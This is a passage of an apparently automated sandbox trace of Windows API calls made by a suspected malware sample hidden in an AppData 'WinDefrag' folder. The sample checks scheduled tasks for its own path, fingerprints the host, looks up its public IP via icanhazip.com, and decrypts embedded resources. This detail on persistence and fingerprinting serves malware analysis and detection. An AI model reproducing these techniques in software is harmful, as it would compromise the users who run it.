ppFolder=0x1edfb0*=0x45a670) returned 0x0 [0261.358] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1ede40 | out: ppTasks=0x1ede40*=0x457fd0) returned 0x0 [0261.360] IRegisteredTaskCollection:get_Count (in: This=0x457fd0, pCount=0x1edf90 | out: pCount=0x1edf90*=1) returned 0x0 [0261.360] IRegisteredTaskCollection:get_Item (in: This=0x457fd0, index=0x1ede70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1ede38 | out: ppRegisteredTask=0x1ede38*=0x4580b0) returned 0x0 [0261.360] IRegisteredTask:get_Name (in: This=0x4580b0, pName=0x1ede30 | out: pName=0x1ede30*="SvcRestartTask") returned 0x0 [0261.360] IRegisteredTask:get_Xml (in: This=0x4580b0, pXml=0x1ede20 | out: pXml=0x1ede20*="\r\n\r\n \r\n $(@%ProgramFiles%\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppc.dll,-200)\r\n $(@%ProgramFiles%\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppc.dll,-200)\r\n 1.0\r\n $(@%ProgramFiles%\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppc.dll,-201)\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-20)\r\n \r\n \r\n \r\n 2004-01-01T00:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n LeastPrivilege\r\n S-1-5-20\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n PT1M\r\n 3\r\n \r\n \r\n \r\n \r\n %systemroot%\\system32\\sc.exe\r\n start osppsvc\r\n \r\n \r\n") returned 0x0 [0261.363] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%ProgramFiles%\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppc.dll,-200)\r\n $(@%ProgramFiles%\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppc.dll,-200)\r\n 1.0\r\n $(@%ProgramFiles%\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppc.dll,-201)\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-20)\r\n \r\n \r\n \r\n 2004-01-01T00:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n LeastPrivilege\r\n S-1-5-20\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n PT1M\r\n 3\r\n \r\n \r\n \r\n \r\n %systemroot%\\system32\\sc.exe\r\n start osppsvc\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0261.408] IUnknown:Release (This=0x4580b0) returned 0x0 [0261.409] IUnknown:Release (This=0x457fd0) returned 0x0 [0261.409] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1ede28 | out: ppFolders=0x1ede28*=0x457fd0) returned 0x0 [0261.410] ITaskFolderCollection:get_Count (in: This=0x457fd0, pCount=0x1edfa8 | out: pCount=0x1edfa8*=0) returned 0x0 [0261.410] IUnknown:Release (This=0x457fd0) returned 0x0 [0261.410] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0261.410] ITaskFolderCollection:get_Item (in: This=0x456710, index=0x1ee000*(varType=0x3, wReserved1=0x2b, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x1), ppFolder=0x1edfb0 | out: ppFolder=0x1edfb0*=0x45a670) returned 0x0 [0261.410] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1ede40 | out: ppTasks=0x1ede40*=0x457ff0) returned 0x0 [0261.411] IRegisteredTaskCollection:get_Count (in: This=0x457ff0, pCount=0x1edf90 | out: pCount=0x1edf90*=0) returned 0x0 [0261.411] IUnknown:Release (This=0x457ff0) returned 0x0 [0261.411] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1ede28 | out: ppFolders=0x1ede28*=0x457ff0) returned 0x0 [0261.413] ITaskFolderCollection:get_Count (in: This=0x457ff0, pCount=0x1edfa8 | out: pCount=0x1edfa8*=0) returned 0x0 [0261.413] IUnknown:Release (This=0x457ff0) returned 0x0 [0261.413] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0261.413] IUnknown:Release (This=0x456710) returned 0x0 [0261.413] IUnknown:Release (This=0x456670) returned 0x0 [0261.413] TaskScheduler:IUnknown:Release (This=0x46df80) returned 0x0 [0261.413] GetVersionExW (in: lpVersionInformation=0x1ee210*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x1, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ee210*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0261.413] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77b20000 [0261.413] GetProcAddress (hModule=0x77b20000, lpProcName="GetNativeSystemInfo") returned 0x77b2b7e0 [0261.413] GetNativeSystemInfo (in: lpSystemInfo=0x1ee330 | out: lpSystemInfo=0x1ee330*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0261.413] _vsnwprintf (in: _Buffer=0x2ccf20, _BufferCount=0xff, _Format="%s %s SP%d", _ArgList=0x1ee1f8 | out: _Buffer="Windows 7 x64 SP1") returned 17 [0261.414] GetFileAttributesW (lpFileName="Data\\" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\windefrag\\data")) returned 0xffffffff [0261.414] CreateDirectoryW (lpPathName="Data\\" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\windefrag\\data"), lpSecurityAttributes=0x0) returned 1 [0261.415] GetVersionExW (in: lpVersionInformation=0x1ee110*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x1f70000, dwMinorVersion=0x14, dwBuildNumber=0x0, dwPlatformId=0x1ee4d0, szCSDVersion="") | out: lpVersionInformation=0x1ee110*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0261.415] GetComputerNameW (in: lpBuffer=0x2d18a0, nSize=0x1ee658 | out: lpBuffer="YKYD69Q", nSize=0x1ee658) returned 1 [0261.415] wsprintfW (in: param_1=0x2d18b2, param_2="%d%d%d." | out: param_1="617601.") returned 7 [0261.416] rand () returned 3650 [0261.416] rand () returned 23023 [0261.416] rand () returned 7819 [0261.416] rand () returned 5691 [0261.416] rand () returned 26963 [0261.416] rand () returned 24964 [0261.416] rand () returned 1204 [0261.416] rand () returned 5969 [0261.416] rand () returned 19620 [0261.416] rand () returned 28 [0261.416] rand () returned 23181 [0261.416] rand () returned 24349 [0261.416] rand () returned 32374 [0261.416] rand () returned 8000 [0261.416] rand () returned 28305 [0261.416] rand () returned 8451 [0261.416] rand () returned 18479 [0261.416] rand () returned 30736 [0261.416] rand () returned 5484 [0261.416] rand () returned 7882 [0261.416] rand () returned 25867 [0261.416] rand () returned 5931 [0261.416] rand () returned 11862 [0261.416] rand () returned 27553 [0261.416] rand () returned 18702 [0261.416] rand () returned 22479 [0261.416] rand () returned 16800 [0261.416] rand () returned 24671 [0261.417] rand () returned 21565 [0261.417] rand () returned 6722 [0261.417] rand () returned 28044 [0261.417] rand () returned 9487 [0261.417] GetAdaptersInfo (in: AdapterInfo=0x2d1920, SizePointer=0x1ee650 | out: AdapterInfo=0x2d1920, SizePointer=0x1ee650) returned 0x0 [0261.421] CryptAcquireContextW (in: phProv=0x1ee5c0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee5c0*=0x2d1e60) returned 1 [0261.436] CryptCreateHash (in: hProv=0x2d1e60, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee5b8 | out: phHash=0x1ee5b8) returned 1 [0261.436] CryptHashData (hHash=0x2a5b60, pbData=0x2d192c, dwDataLen=0x194, dwFlags=0x0) returned 1 [0261.436] CryptGetHashParam (in: hHash=0x2a5b60, dwParam=0x4, pbData=0x1ee608, pdwDataLen=0x1ee5b0, dwFlags=0x0 | out: pbData=0x1ee608, pdwDataLen=0x1ee5b0) returned 1 [0261.437] CryptGetHashParam (in: hHash=0x2a5b60, dwParam=0x2, pbData=0x2c9e90, pdwDataLen=0x1ee608, dwFlags=0x0 | out: pbData=0x2c9e90, pdwDataLen=0x1ee608) returned 1 [0261.437] CryptDestroyHash (hHash=0x2a5b60) returned 1 [0261.437] CryptReleaseContext (hProv=0x2d1e60, dwFlags=0x0) returned 1 [0261.437] _vsnwprintf (in: _Buffer=0x2d1bf0, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="8D") returned 2 [0261.437] _vsnwprintf (in: _Buffer=0x2d1bf4, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="09") returned 2 [0261.437] _vsnwprintf (in: _Buffer=0x2d1bf8, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="CC") returned 2 [0261.437] _vsnwprintf (in: _Buffer=0x2d1bfc, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="66") returned 2 [0261.437] _vsnwprintf (in: _Buffer=0x2d1c00, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="B1") returned 2 [0261.437] _vsnwprintf (in: _Buffer=0x2d1c04, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="41") returned 2 [0261.437] _vsnwprintf (in: _Buffer=0x2d1c08, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="59") returned 2 [0261.437] _vsnwprintf (in: _Buffer=0x2d1c0c, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="41") returned 2 [0261.437] _vsnwprintf (in: _Buffer=0x2d1c10, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="C3") returned 2 [0261.437] _vsnwprintf (in: _Buffer=0x2d1c14, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="AC") returned 2 [0261.437] _vsnwprintf (in: _Buffer=0x2d1c18, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="4F") returned 2 [0261.437] _vsnwprintf (in: _Buffer=0x2d1c1c, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="64") returned 2 [0261.437] _vsnwprintf (in: _Buffer=0x2d1c20, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="1B") returned 2 [0261.437] _vsnwprintf (in: _Buffer=0x2d1c24, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="CB") returned 2 [0261.437] _vsnwprintf (in: _Buffer=0x2d1c28, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="60") returned 2 [0261.437] _vsnwprintf (in: _Buffer=0x2d1c2c, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="0B") returned 2 [0261.437] _vsnwprintf (in: _Buffer=0x2d1c30, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="AF") returned 2 [0261.437] _vsnwprintf (in: _Buffer=0x2d1c34, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="16") returned 2 [0261.437] _vsnwprintf (in: _Buffer=0x2d1c38, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="0D") returned 2 [0261.437] _vsnwprintf (in: _Buffer=0x2d1c3c, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="FF") returned 2 [0261.437] _vsnwprintf (in: _Buffer=0x2d1c40, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="7C") returned 2 [0261.437] _vsnwprintf (in: _Buffer=0x2d1c44, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="20") returned 2 [0261.437] _vsnwprintf (in: _Buffer=0x2d1c48, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="73") returned 2 [0261.437] _vsnwprintf (in: _Buffer=0x2d1c4c, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="A2") returned 2 [0261.438] _vsnwprintf (in: _Buffer=0x2d1c50, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="16") returned 2 [0261.438] _vsnwprintf (in: _Buffer=0x2d1c54, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="B5") returned 2 [0261.438] _vsnwprintf (in: _Buffer=0x2d1c58, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="F3") returned 2 [0261.438] _vsnwprintf (in: _Buffer=0x2d1c5c, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="17") returned 2 [0261.438] _vsnwprintf (in: _Buffer=0x2d1c60, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="4A") returned 2 [0261.438] _vsnwprintf (in: _Buffer=0x2d1c64, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="B9") returned 2 [0261.438] _vsnwprintf (in: _Buffer=0x2d1c68, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="2C") returned 2 [0261.438] _vsnwprintf (in: _Buffer=0x2d1c6c, _BufferCount=0xff, _Format="%02X", _ArgList=0x1ee608 | out: _Buffer="F2") returned 2 [0261.438] _time64 (in: _Time=0x0 | out: _Time=0x0) returned 0x5c09a2e6 [0261.438] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2d1920 [0261.454] GetTickCount () returned 0x4b2bb [0261.454] WinHttpConnect (hSession=0x2d1920, pswzServerName="icanhazip.com", nServerPort=0x50, dwReserved=0x0) returned 0x2df420 [0261.461] WinHttpSetTimeouts (hInternet=0x2d1920, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1 [0261.461] WinHttpOpenRequest (hConnect=0x2df420, pwszVerb="GET", pwszObjectName="", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x2df570 [0261.462] WinHttpSendRequest (in: hRequest=0x2df570, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0 | out: lpOptional=0x0*) returned 1 [0261.687] WinHttpReceiveResponse (hRequest=0x2df570, lpReserved=0x0) returned 1 [0261.688] WinHttpQueryHeaders (in: hRequest=0x2df570, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x1ee3e0, lpdwBufferLength=0x1ee3f8, lpdwIndex=0x0 | out: lpBuffer=0x1ee3e0*, lpdwBufferLength=0x1ee3f8*=0x4, lpdwIndex=0x0) returned 1 [0261.688] WinHttpQueryDataAvailable (in: hRequest=0x2df570, lpdwNumberOfBytesAvailable=0x1ee3e0 | out: lpdwNumberOfBytesAvailable=0x1ee3e0*=0xe) returned 1 [0261.688] WinHttpReadData (in: hRequest=0x2df570, lpBuffer=0x2c7f20, dwNumberOfBytesToRead=0xe, lpdwNumberOfBytesRead=0x1ee3e8 | out: lpBuffer=0x2c7f20*, lpdwNumberOfBytesRead=0x1ee3e8*=0xe) returned 1 [0261.688] WinHttpQueryDataAvailable (in: hRequest=0x2df570, lpdwNumberOfBytesAvailable=0x1ee3e0 | out: lpdwNumberOfBytesAvailable=0x1ee3e0*=0x0) returned 1 [0261.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c7f20, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0261.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c7f20, cbMultiByte=13, lpWideCharStr=0x2e30b0, cchWideChar=13 | out: lpWideCharStr="95.222.164.48") returned 13 [0261.689] WinHttpCloseHandle (hInternet=0x2df570) returned 1 [0261.689] WinHttpCloseHandle (hInternet=0x2df420) returned 1 [0261.689] WinHttpCloseHandle (hInternet=0x2d1920) returned 1 [0261.689] _time64 (in: _Time=0x0 | out: _Time=0x0) returned 0x5c09a2e7 [0261.689] CoCreateInstance (in: rclsid=0x14002a500*(Data1=0xf5078f32, Data2=0xc551, Data3=0x11d3, Data4=([0]=0x89, [1]=0xb9, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x1f, [6]=0xe2, [7]=0x21)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x14002a510*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x1ee650 | out: ppv=0x1ee650*=0x17a7180) returned 0x0 [0261.709] DOMDocument30:IXMLDOMDocument:put_async (This=0x17a7180, async=0) returned 0x0 [0261.709] DOMDocument30:IXMLDOMDocument:put_validateOnParse (This=0x17a7180, validateOnParse=0) returned 0x0 [0261.709] DOMDocument30:IXMLDOMDocument:put_resolveExternals (This=0x17a7180, resolveExternals=0) returned 0x0 [0261.709] FindResourceW (hModule=0x0, lpName="DIAL", lpType=0xa) returned 0x140037068 [0261.709] LoadResource (hModule=0x0, hResInfo=0x140037068) returned 0x14003709c [0261.709] LockResource (hResData=0x14003709c) returned 0x14003709c [0261.709] NCryptOpenStorageProvider (in: phProvider=0x1ee698, pszProviderName="", dwFlags=0x0 | out: phProvider=0x1ee698) returned 0x0 [0262.233] NCryptImportKey (in: hProvider=0x2ec020, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", pParameterList=0x0, phKey=0x1ee580, pbData=0x1400370a0, cbData=0x68, dwFlags=0x0 | out: phKey=0x1ee580) returned 0x0 [0262.245] NCryptDeleteKey (hKey=0x2c8120, dwFlags=0x0) returned 0x0 [0262.245] NCryptFreeObject (hObject=0x2ec020) returned 0x0 [0262.246] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\\\*", lpFindFileData=0x1edc20 | out: lpFindFileData=0x1edc20) returned 0x2d25d0 [0262.247] FindNextFileW (in: hFindFile=0x2d25d0, lpFindFileData=0x1edc20 | out: lpFindFileData=0x1edc20) returned 1 [0262.247] FindNextFileW (in: hFindFile=0x2d25d0, lpFindFileData=0x1edc20 | out: lpFindFileData=0x1edc20) returned 1 [0262.247] FindNextFileW (in: hFindFile=0x2d25d0, lpFindFileData=0x1edc20 | out: lpFindFileData=0x1edc20) returned 1 [0262.247] FindNextFileW (in: hFindFile=0x2d25d0, lpFindFileData=0x1edc20 | out: lpFindFileData=0x1edc20) returned 0 [0262.247] FindClose (in: hFindFile=0x2d25d0 | out: hFindFile=0x2d25d0) returned 1 [0262.247] CoCreateInstance (in: rclsid=0x14002a500*(Data1=0xf5078f32, Data2=0xc551, Data3=0x11d3, Data4=([0]=0x89, [1]=0xb9, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x1f, [6]=0xe2, [7]=0x21)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x14002a510*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x1ee520 | out: ppv=0x1ee520*=0x17a8440) returned 0x0 [0262.248] DOMDocument30:IXMLDOMDocument:put_async (This=0x17a8440, async=0) returned 0x0 [0262.248] DOMDocument30:IXMLDOMDocument:put_validateOnParse (This=0x17a8440, validateOnParse=0) returned 0x0 [0262.248] DOMDocument30:IXMLDOMDocument:put_resolveExternals (This=0x17a8440, resolveExternals=0) returned 0x0 [0262.248] FindResourceW (hModule=0x0, lpName="RES", lpType=0xa) returned 0x140037078 [0262.248] LoadResource (hModule=0x0, hResInfo=0x140037078) returned 0x140037108 [0262.248] LockResource (hResData=0x140037108) returned 0x140037108 [0262.248] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.249] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.249] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x20, dwFlags=0x0) returned 1 [0262.249] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.249] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e3410, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e3410, pdwDataLen=0x1ee448) returned 1 [0262.249] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.249] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.249] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.250] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.250] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x40, dwFlags=0x0) returned 1 [0262.250] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.250] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e3440, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e3440, pdwDataLen=0x1ee448) returned 1 [0262.250] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.250] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.250] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.250] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.250] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x60, dwFlags=0x0) returned 1 [0262.250] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.251] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e3470, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e3470, pdwDataLen=0x1ee448) returned 1 [0262.251] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.251] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.251] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.251] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.251] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x80, dwFlags=0x0) returned 1 [0262.251] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.251] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e34a0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e34a0, pdwDataLen=0x1ee448) returned 1 [0262.251] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.251] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.251] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.252] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.252] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0262.252] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.252] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e34d0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e34d0, pdwDataLen=0x1ee448) returned 1 [0262.252] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.252] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.252] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.253] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.253] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xc0, dwFlags=0x0) returned 1 [0262.253] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.253] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e3500, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e3500, pdwDataLen=0x1ee448) returned 1 [0262.253] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.253] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.253] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.254] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.254] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xe0, dwFlags=0x0) returned 1 [0262.254] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.254] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e3530, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e3530, pdwDataLen=0x1ee448) returned 1 [0262.254] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.254] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.254] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.254] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.255] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x100, dwFlags=0x0) returned 1 [0262.255] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: 